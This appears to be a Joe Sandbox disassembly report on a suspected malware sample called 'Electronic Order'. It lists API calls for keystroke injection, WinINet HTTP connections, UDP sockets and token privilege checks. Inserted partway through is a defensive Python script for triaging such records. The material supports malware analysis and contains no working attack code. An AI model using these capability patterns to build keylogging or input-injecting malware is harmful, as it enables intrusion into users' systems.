                                      • Instruction ID: f7284c7f2c25d93d44384b139f8251e6b4556b088cb53120fea80530276d23cf
                                      • Opcode Fuzzy Hash: 7e90f517339d4b8aca4f30542dc34bd099d4aba509d5a19c5f4715c86169973f
                                      • Instruction Fuzzy Hash: D341C274740201AFEB10AF34DC8AF7A7BE9DB04B14F54801CFA19AF2C2DA719C018BA1
                                      APIs
                                       • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00E4F910), ref: 00E367BA (wsock32.dll ordinal 16 is recv)
                                      • _strlen.LIBCMT ref: 00E367EC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _strlen
                                      • String ID:
                                      • API String ID: 4218353326-0
                                      • Opcode ID: 3602c42cc6b543bffaca03791f688824a1ce88cdce68ace6bd94e16005c9b4cb
                                      • Instruction ID: 884f3197c4b6c84c548f90576080aa09c812f86e6b07b917dcdbfb3a396a3d90
                                      • Opcode Fuzzy Hash: 3602c42cc6b543bffaca03791f688824a1ce88cdce68ace6bd94e16005c9b4cb
                                      • Instruction Fuzzy Hash: 1F41E331A00105AFCB14EBB4DCD9FAEB7A9EF48314F158169F815AB292DB30AD40C760
                                      APIs
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E2BB09
                                      • GetLastError.KERNEL32(?,00000000), ref: 00E2BB2F
                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E2BB54
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E2BB80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                      • String ID:
                                      • API String ID: 3321077145-0
                                      • Opcode ID: 5b2a4a869b1c6fae25c145a385d19077320528abdeb1dd94a00f78f2087b2c24
                                      • Instruction ID: 32adc9c450bd46d7d8f3963380c9b660f66cf9bf3ac68afeed6dcc3e082859e0
                                      • Opcode Fuzzy Hash: 5b2a4a869b1c6fae25c145a385d19077320528abdeb1dd94a00f78f2087b2c24
                                      • Instruction Fuzzy Hash: 17412B39200A11DFCB11EF25D599E5DBBE1EF49714B099498E84AAB362CB34FD01CFA1
                                      APIs
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E48B4D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: InvalidateRect
                                      • String ID:
                                      • API String ID: 634782764-0
                                      • Opcode ID: 7c0ae72b91ce4bd33766c1785312beff46dff0c61178f531c2236188cfe26ee3
                                      • Instruction ID: 396ed97b5d155c5d57db6d2fd266294d6508a4d18308a76b781b45c2eb070018
                                      • Opcode Fuzzy Hash: 7c0ae72b91ce4bd33766c1785312beff46dff0c61178f531c2236188cfe26ee3
                                      • Instruction Fuzzy Hash: 1B3104B8640204BFEF249E18EE45FED37A4EB05318F246616FA45F72A0CE30AD409751
                                      APIs
                                      • ClientToScreen.USER32(?,?), ref: 00E4AE1A
                                      • GetWindowRect.USER32(?,?), ref: 00E4AE90
                                      • PtInRect.USER32(?,?,00E4C304), ref: 00E4AEA0
                                      • MessageBeep.USER32(00000000), ref: 00E4AF11
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Rect$BeepClientMessageScreenWindow
                                      • String ID:
                                      • API String ID: 1352109105-0
                                      • Opcode ID: c90b7feb97009939d6e53bede46bbc2872fe47f049655d40dc5141502bf6c230
                                      • Instruction ID: 87ba08de20998e844d75fbfd452ed7326105273928456b6b12636c1eb5977dab
                                      • Opcode Fuzzy Hash: c90b7feb97009939d6e53bede46bbc2872fe47f049655d40dc5141502bf6c230
                                      • Instruction Fuzzy Hash: D041B170640105DFCB15CF59E884B997BF5FF49360F1891B9E428EB261C730A846CF92
                                      APIs
                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E21037
                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00E21053
                                       • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00E210B9 (message 00000102 is WM_CHAR)
                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00E2110B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: d8bb3db5d071faea74c2a2829ae493247e2ee20eb38824d246c6b24ae2606afb
                                      • Instruction ID: 13333e17782c81e97b6daee5835b455e5369c0eb18c616021e4946806a416fa0
                                      • Opcode Fuzzy Hash: d8bb3db5d071faea74c2a2829ae493247e2ee20eb38824d246c6b24ae2606afb
                                      • Instruction Fuzzy Hash: AA319C30E406B8AEFF308B66AC05FFEBBA9AB65314F08529AE580721D1C3744FC58751
                                      APIs
                                      • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00E21176
                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E21192
                                       • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E211F1 (message 00000101 is WM_KEYUP)
                                      • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00E21243
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: 03430e5f3bc3c96a4fe4d4ca1bee5be7ee8a4080482e99b6c394f2cfb889c377
                                      • Instruction ID: 5e561835b3c2dd913837bc2fbdbf135336eb826679e413062241fb51c632360d
                                      • Opcode Fuzzy Hash: 03430e5f3bc3c96a4fe4d4ca1bee5be7ee8a4080482e99b6c394f2cfb889c377
                                      • Instruction Fuzzy Hash: 97314830A413689EEF208E65AC057FE7BAAAB69314F08639AF590B21E1C3344B659751
                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00DF644B
                                      • __isleadbyte_l.LIBCMT ref: 00DF6479
                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00DF64A7
                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00DF64DD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      • Opcode ID: 4f597d25519881def4a1b5cb8d3785102eed05d38b64cd07a4502cdf6336631e
                                      • Instruction ID: 391ddf883bd8eb331b48ba9abd18436570a5c2464c149af4b99814572c399951
                                      • Opcode Fuzzy Hash: 4f597d25519881def4a1b5cb8d3785102eed05d38b64cd07a4502cdf6336631e
                                      • Instruction Fuzzy Hash: EB31D23160824EAFDB21AF75C845BBA7BB5FF41710F1A8029E96487591D731D890DBB0
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 00E45189
                                        • Part of subcall function 00E2387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E23897
                                        • Part of subcall function 00E2387D: GetCurrentThreadId.KERNEL32 ref: 00E2389E
                                        • Part of subcall function 00E2387D: AttachThreadInput.USER32(00000000,?,00E252A7), ref: 00E238A5
                                      • GetCaretPos.USER32(?), ref: 00E4519A
                                      • ClientToScreen.USER32(00000000,?), ref: 00E451D5
                                      • GetForegroundWindow.USER32 ref: 00E451DB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                      • String ID:
                                      • API String ID: 2759813231-0
                                      • Opcode ID: 90251c42081bdf97f188cdbfac533dbf02547743e305cba1afb58bf5eca9d5c5
                                      • Instruction ID: 41b4b5c2ed04a6a6b8d6bf7c081c95f652fb5bfd2a824c347bb2c448a89f6c3c
                                      • Opcode Fuzzy Hash: 90251c42081bdf97f188cdbfac533dbf02547743e305cba1afb58bf5eca9d5c5
                                      • Instruction Fuzzy Hash: EC312C76900109AFDB04EFA5D885EEFF7F9EF98300F10406AE415E7241EA759E45CBA0
                                      APIs
                                        • Part of subcall function 00DC2612: GetWindowLongW.USER32(?,000000EB), ref: 00DC2623
                                      • GetCursorPos.USER32(?), ref: 00E4C7C2
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00DFBBFB,?,?,?,?,?), ref: 00E4C7D7
                                      • GetCursorPos.USER32(?), ref: 00E4C824
                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00DFBBFB,?,?,?), ref: 00E4C85E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                      • String ID:
                                      • API String ID: 2864067406-0
                                      • Opcode ID: efdb20515a32fd86f31dd140dee6ec34710a5932b63d9d421dc809dd7ebc2679
                                      • Instruction ID: 27ed319fd5e8ad0442e438ac56e86807e74d8d6cf43ac854ad991b94c151c029
                                      • Opcode Fuzzy Hash: efdb20515a32fd86f31dd140dee6ec34710a5932b63d9d421dc809dd7ebc2679
                                      • Instruction Fuzzy Hash: 3E310F35601018AFCB19CF5AD888EFA7BBAEB0D710F104069F908AB261D331AD50DFA0
                                      APIs
                                      • __setmode.LIBCMT ref: 00DE0BF2
                                        • Part of subcall function 00DC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E27B20,?,?,00000000), ref: 00DC5B8C
                                        • Part of subcall function 00DC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E27B20,?,?,00000000,?,?), ref: 00DC5BB0
                                      • _fprintf.LIBCMT ref: 00DE0C29
                                      • OutputDebugStringW.KERNEL32(?), ref: 00E16331
                                        • Part of subcall function 00DE4CDA: _flsall.LIBCMT ref: 00DE4CF3
                                      • __setmode.LIBCMT ref: 00DE0C5E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                      • String ID:
                                      • API String ID: 521402451-0
                                      • Opcode ID: 2c0b05e78b71d1328b5d7b3569c5cd5f4d24071aca1b1877a9189cc68a462f54
                                      • Instruction ID: 9f8025033643c16b0b055e0ae670ecc58f3c47c71309fc912c6d84ec1e161da6
                                      • Opcode Fuzzy Hash: 2c0b05e78b71d1328b5d7b3569c5cd5f4d24071aca1b1877a9189cc68a462f54
                                      • Instruction Fuzzy Hash: 6511E4329042456ECB04B7B6AC46EBEBB69DF85320F24015AF108A71D2DE615DC687B5
                                      APIs
                                         • Part of subcall function 00E18652: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 00E18669 (the report labels class 3 as TokenIntegrityLevel, but TOKEN_INFORMATION_CLASS value 3 is TokenPrivileges; TokenIntegrityLevel is 25. The LookupPrivilegeValueW and _memcmp calls below fit a LUID comparison against the returned TOKEN_PRIVILEGES array)
                                         • Part of subcall function 00E18652: GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 00E18673
                                         • Part of subcall function 00E18652: GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 00E18682
                                         • Part of subcall function 00E18652: HeapAlloc.KERNEL32(00000000,?,TokenPrivileges,?,00000000,?), ref: 00E18689
                                         • Part of subcall function 00E18652: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 00E1869F
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E18BEB
                                      • _memcmp.LIBCMT ref: 00E18C0E
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E18C44
                                      • HeapFree.KERNEL32(00000000), ref: 00E18C4B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                      • String ID:
                                      • API String ID: 1592001646-0
                                      • Opcode ID: 049fe74a08ac2a5be4840aa6da94b8d43a1ea6daf49543b14977586500c440d1
                                      • Instruction ID: 3710de35c7b8927119412f1b1a14337b6cbc8c70f4a80afc78eb7dfa489ed529
                                      • Opcode Fuzzy Hash: 049fe74a08ac2a5be4840aa6da94b8d43a1ea6daf49543b14977586500c440d1
                                      • Instruction Fuzzy Hash: BB216971E02208EFDB10DFA5CA45BEEB7B8EF54358F144059E854B7241DB31AA86CBA1
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E31A97
                                        • Part of subcall function 00E31B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E31B40
                                        • Part of subcall function 00E31B21: InternetCloseHandle.WININET(00000000), ref: 00E31BDD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Internet$CloseConnectHandleOpen
                                      • String ID:
                                      • API String ID: 1463438336-0
                                      • Opcode ID: 1687a46ffc20617c1336f39c61bc3074417e5ce602481528099ec300082ed664
                                      • Instruction ID: 4a1d1c34bb5e27f6f9fb54e1591d569034811f27b813d8404b0900a9593b6c86
                                      • Opcode Fuzzy Hash: 1687a46ffc20617c1336f39c61bc3074417e5ce602481528099ec300082ed664
                                      • Instruction Fuzzy Hash: FA219F35200601BFDB119F608C09FBABBA9FF45705F10506EFA51A6650EB75D815DBA0
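The function records above are a machine listing, and the interesting facts (a UDP socket with SO_BROADCAST, SetKeyboardState/SendInput/PostMessageW keystroke injection, a WinINet client, a token privilege scan) are spread over many near-identical blocks. The following Python is an added example by the editor, not code from the Joe Sandbox report or from AutoIt: it parses records of this shape, resolves the ordinal imports the report prints as #16 and #21 through the standard wsock32.dll export ordinal table, decodes the uMsg argument of PostMessageW, and tags each function with a coarse capability. The sample records are copied from this page's listing (constructed input, with the token class label written as TokenPrivileges, which is what class value 3 denotes); the capability groups, the record key and the helper names are this example's own assumptions, not Joe Sandbox signatures.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: four function records copied from this report's "APIs" listing.
SAMPLE = """\
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00E36CE4
• WSAGetLastError.WSOCK32(00000000), ref: 00E36CF4
  • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E36D58
Memory Dump Source
• Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• API ID: ErrorLast$__itow__swprintfsocket
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E21037
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00E21053
• PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00E210B9
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00E2110B
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E31A97
  • Part of subcall function 00E31B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E31B40
APIs
  • Part of subcall function 00E18652: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 00E18669
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E18BEB
• _memcmp.LIBCMT ref: 00E18C0E
"""

# Standard export ordinals of wsock32.dll; the report prints ordinal imports as "#N".
WSOCK32_ORDINALS = {1: "accept", 2: "bind", 3: "closesocket", 4: "connect", 5: "getpeername",
                    6: "getsockname", 7: "getsockopt", 8: "htonl", 9: "htons", 10: "inet_addr",
                    11: "inet_ntoa", 12: "ioctlsocket", 13: "listen", 14: "ntohl", 15: "ntohs",
                    16: "recv", 17: "recvfrom", 18: "select", 19: "send", 20: "sendto",
                    21: "setsockopt", 22: "shutdown", 23: "socket"}
WINDOW_MESSAGES = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP", 0x102: "WM_CHAR"}
# Capability groups are this example's own triage buckets (assumption), not Joe Sandbox signatures.
CAPABILITIES = {
    "udp/tcp socket": {"socket", "setsockopt", "recv", "recvfrom", "send", "sendto", "connect"},
    "synthetic keyboard input": {"SetKeyboardState", "SendInput", "keybd_event"},
    "HTTP client (WinINet)": {"InternetConnectW", "InternetOpenUrlW", "InternetReadFile"},
    "token privilege query": {"GetTokenInformation", "LookupPrivilegeValueW"},
}
# One call line: optional subcall prefix, Name.MODULE, optional (args), ref: address.
API_RE = re.compile(r"^\s*•\s*(?:Part of subcall function (?P<subfn>[0-9A-F]+):\s*)?"
                    r"(?P<name>[#\w:~]+)\.(?P<module>[A-Z0-9_]+)"
                    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")

@dataclass
class Call:
    name: str                  # import name, wsock32 ordinals resolved
    module: str
    args: List[str]            # argument column as printed ("?" = not recovered)
    ref: str                   # call-site address inside the dumped image
    subcall_of: Optional[str]  # callee address when the call is reached through a subcall

def resolve_name(name: str, module: str) -> str:
    """Map an ordinal import such as '#21' to its export name for wsock32/ws2_32."""
    if name.startswith("#") and module in ("WSOCK32", "WS2_32"):
        return WSOCK32_ORDINALS.get(int(name[1:]), name)
    return name

def parse_records(text: str) -> List[List[Call]]:
    """Split the listing at each 'APIs' header; every other report line is ignored."""
    records: List[List[Call]] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            records.append([])
            continue
        m = API_RE.match(line)
        if m and records:
            args = [] if m.group("args") is None else [a.strip() for a in m.group("args").split(",")]
            records[-1].append(Call(resolve_name(m.group("name"), m.group("module")),
                                    m.group("module"), args, m.group("ref"), m.group("subfn")))
    return [r for r in records if r]

def capabilities(calls: List[Call]) -> List[str]:
    names = {c.name for c in calls}
    return sorted(cap for cap, apis in CAPABILITIES.items() if names & apis)

def posted_messages(calls: List[Call]) -> List[str]:
    """Decode the uMsg argument of PostMessageW/SendMessageW calls (0x102 = WM_CHAR)."""
    out = []
    for c in calls:
        if c.name in ("PostMessageW", "SendMessageW") and len(c.args) > 1 and c.args[1] != "?":
            out.append(WINDOW_MESSAGES.get(int(c.args[1], 16), f"0x{int(c.args[1], 16):X}"))
    return out

def triage(text: str) -> List[dict]:
    """One row per function: first direct call site, resolved call names, capabilities, messages."""
    rows = []
    for calls in parse_records(text):
        direct = [c.ref for c in calls if c.subcall_of is None]
        rows.append({"first_ref": direct[0] if direct else calls[0].ref,
                     "calls": [c.name for c in calls],
                     "capabilities": capabilities(calls),
                     "messages": posted_messages(calls)})
    return rows

if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row["first_ref"], ", ".join(row["capabilities"]) or "-", "|", " ".join(row["calls"]))
```

Run it against the full "APIs" section of a report (the text between the first "APIs" header and the end of the function listing) and sort rows by capability; functions with no bucket are the bulk of the runtime and can be skipped, while the few that land in a bucket are the ones worth opening in the disassembler. Subcall lines are kept on purpose: the privilege query above only shows GetTokenInformation through its subcall, so a direct-calls-only filter would miss it.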
                                      APIs
                                        • Part of subcall function 00E1F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00E1E1C4,?,?,?,00E1EFB7,00000000,000000EF,00000119,?,?), ref: 00E1F5BC
                                        • Part of subcall function 00E1F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00E1F5E2
                                        • Part of subcall function 00E1F5AD: lstrcmpiW.KERNEL32(00000000,?,00E1E1C4,?,?,?,00E1EFB7,00000000,000000EF,00000119,?,?), ref: 00E1F613
                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00E1EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E1E1DD
                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00E1E203
                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E1EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E1E237
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: lstrcmpilstrcpylstrlen
                                      • String ID: cdecl
                                      • API String ID: 4031866154-3896280584
